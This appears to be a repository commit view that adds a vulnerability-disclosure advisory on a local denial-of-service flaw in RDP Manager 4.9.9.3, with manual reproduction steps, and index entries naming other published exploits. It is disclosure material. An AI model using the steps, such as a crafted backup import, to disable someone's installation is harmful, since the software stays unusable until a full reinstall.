|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
RDP-Manager is a program for the better administration of several remote desktops and further connections. The connection parameters
|
||||
as well as user name and password can be stored in the program, the latter also encrypted by an external password if desired. When opened,
|
||||
the connections created are clearly structured in individual tabs in the application window, which means that the overview is retained even
|
||||
if several connections are open.
|
||||
|
||||
(Copy of the Homepage: https://www.cinspiration.de/download.html )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a local denial of service vulnerability in the RDP Manager v4.9.9.3 windows software client.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-06-01: Researcher Notification & Coordination (Security Researcher)
|
||||
2021-06-02: Vendor Notification (Security Department)
|
||||
2021-**-**: Vendor Response/Feedback (Security Department)
|
||||
2021-**-**: Vendor Fix/Patch (Service Developer Team)
|
||||
2021-**-**: Security Acknowledgements (Security Department)
|
||||
2021-10-18: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Low
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (User Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
No User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Independent Security Research
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A local denial of service vulnerability has been discovered in the official RDP Manager v4.9.9.3 windows software client.
|
||||
The denial of service attack allows an attacker to freeze, block or crash a local process, service or component to compromise.
|
||||
|
||||
The local vulnerability is located in the Verbindungsname and Server input fields of the Verbindung (Neu/Bearbeiten).
|
||||
The Verbindungsname and Server inputs are not limited by the size of characters. Thus allows a local privileged attacker
|
||||
to add a malformed server entry with a large size that crashs (multiple application errors) the application permanently.
|
||||
The entry can be modified as zip backup for imports as sqLitedatabase.db3 to make the software unusable until a full
|
||||
reinstall with separate deletes is performed to recover.
|
||||
|
||||
Successful exploitation of the denial of service vulnerability results in permanent unhandled software and application crashs.
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Verbindungsname
|
||||
[+] Server
|
||||
|
||||
Affected Module(s):
|
||||
[+] Wiederherstellen (sqLitedatabase.db3)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The local denial of service vulnerability can be exploited by attackers with system access privileges without user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Manual steps to reproduce ...
|
||||
1. Install the RDP-Manager.exe software for windows
|
||||
2. Start the software and add a new entry in the main tab
|
||||
3. Include a large amount of characters max 1024 and save the entry
|
||||
4. The software freezes and crashs with multiple errors in the actual session and after restart it crash permanently as well
|
||||
Note: Alternativly you can export a database with regular valid entry and modify it via backup for a import
|
||||
5. Successful reproduce of the local denial of service vulnerability!
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
N/A - Anonymous [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=N%2FA+-+Anonymous
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ; https://www.vulnerability-db.com
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
|
@ -11410,6 +11410,7 @@ id,file,description,date,author,type,platform,port
|
|||
50470,exploits/windows/local/50470.py,"Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
|
||||
50471,exploits/windows/local/50471.py,"YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
|
||||
50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",1970-01-01,ro0k,local,windows,
|
||||
50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
||||
|
@ -44575,3 +44576,19 @@ id,file,description,date,author,type,platform,port
|
|||
50469,exploits/multiple/webapps/50469.rb,"Ericsson Network Location MPS GMPC21 - Privilege Escalation (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
|
||||
50473,exploits/multiple/webapps/50473.txt,"i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw",1970-01-01,LiquidWorm,webapps,multiple,
|
||||
50474,exploits/multiple/webapps/50474.txt,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)",1970-01-01,P4p4_M4n3,webapps,multiple,
|
||||
50475,exploits/php/webapps/50475.txt,"PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
|
||||
50476,exploits/php/webapps/50476.txt,"WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
|
||||
50477,exploits/php/webapps/50477.py,"Fuel CMS 1.4.1 - Remote Code Execution (3)",1970-01-01,"Padsala Trushal",webapps,php,
|
||||
50478,exploits/java/webapps/50478.txt,"Eclipse Jetty 11.0.5 - Sensitive File Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java,
|
||||
50479,exploits/php/webapps/50479.txt,"WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Luca Schembri",webapps,php,
|
||||
50480,exploits/java/webapps/50480.go,"OpenAM 13.0 - LDAP Injection",1970-01-01,"Charlton Trezevant",webapps,java,
|
||||
50482,exploits/php/webapps/50482.txt,"Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
|
||||
50483,exploits/php/webapps/50483.txt,"Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
|
||||
50485,exploits/hardware/webapps/50485.txt,"Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,hardware,
|
||||
50486,exploits/php/webapps/50486.txt,"PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
|
||||
50487,exploits/php/webapps/50487.txt,"PHP Melody 3.0 - 'vid' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
|
||||
50489,exploits/php/webapps/50489.txt,"Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
|
||||
50488,exploits/php/webapps/50488.txt,"PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
|
||||
50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,multiple,
|
||||
50491,exploits/php/webapps/50491.txt,"Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
|
||||
50492,exploits/php/webapps/50492.txt,"Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue